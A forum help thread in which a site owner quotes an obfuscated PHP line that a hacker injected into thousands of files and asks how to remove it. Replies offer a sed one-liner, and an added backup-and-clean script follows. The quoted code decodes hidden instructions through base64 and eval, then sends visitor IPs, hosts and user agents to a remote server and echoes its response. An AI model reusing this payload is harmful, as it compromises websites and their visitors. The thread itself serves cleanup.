LinuxQuestions.org
10-24-2011, 06:14 PM   #1
marco114
Complex Find and Replace using sed or other tool


SUPER SORRY FOR THE LONG LINE.. I need to explain..

A server of mine was hacked recently and the hacker added a line of code to every .php file in my directory. There's about 4,000 files so I need some script to remove this malicious code below:

PHP Code:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host= $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

I want to find and replace it with NOTHING. I have tried sed, but with all these characters, it's not working for me.

I tried putting it in a variable also. No luck.

My Poor Attempt at a Bash Script

Code:
#!/bin/bash
OLD="<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host= $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>"
NEW=""
DPATH="/fixer/orig/*.php"
BPATH="/fixer/orig_bu/foo"
TFILE="/tmp/out.tmp.$$"
[ ! -d $BPATH ] && mkdir -p $BPATH || :
for f in $DPATH
do
  if [ -f $f -a -r $f ]; then
    /bin/cp -f $f $BPATH
   sed "s/$OLD/$NEW/g" "$f" > $TFILE && mv $TFILE "$f"
  else
   echo "Error: Cannot read $f"
  fi
done
/bin/rm -rf $TFILE
 
10-24-2011, 06:42 PM   #2
countach74
You don't need to type in the whole line to sed. Use a wildcard. Something like this should work:

Code:
sed -i 's/<?php $_F=__FILE__;.*//' *.php
Naturally, I would test it first.
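
A more cautious form of the cleanup discussed in this thread, as an added example that is not from either poster: it recurses through the tree, backs up each affected file, removes only the text from the injected marker through the first `?>` on that line, then checks that no marker remains. The function name, the directory arguments and the regular expression are assumptions, and it relies on GNU grep and GNU sed.

```sh
#!/bin/sh
# Added example (not from the thread). Requires GNU grep and GNU sed.
# Fixed prefix of the injected code, as shown in the first post.
MARKER='<?php $_F=__FILE__;$_X='
# ERE: the marker, then everything up to and including the first "?>".
PATTERN='<\?php \$_F=__FILE__;\$_X=([^?]|\?[^>])*\?>'

# clean_injected_php SRC_DIR BACKUP_DIR   (hypothetical helper name)
# Prints how many files were edited. Exit status: 0 = tree is clean,
# 1 = the marker is still present somewhere, 2 = a backup copy failed.
# The body runs in a subshell, so its variables stay local.
clean_injected_php() (
    src=$1 backup=$2 count=0
    list=$(mktemp) || exit 2
    # -F treats the marker as a fixed string, so no regex escaping is needed.
    grep -rlF --include='*.php' -e "$MARKER" "$src" > "$list" || :
    while IFS= read -r f; do
        rel=${f#"$src"/}
        mkdir -p "$backup/$(dirname "$rel")"
        # Never edit a file that could not be backed up first.
        cp -p -- "$f" "$backup/$rel" || exit 2
        sed -E -i "s/$PATTERN//g" "$f"
        count=$((count + 1))
    done < "$list"
    rm -f "$list"
    echo "$count"
    # Verification pass: a block that spans several lines, or has no closing
    # "?>" on its line, is not matched by sed and is reported here.
    ! grep -rqF --include='*.php' -e "$MARKER" "$src"
)

# Usage: sh clean.sh /path/to/webroot /path/to/backups
# (give SRC_DIR without a trailing slash)
if [ "$#" -eq 2 ]; then
    clean_injected_php "$1" "$2"
fi
```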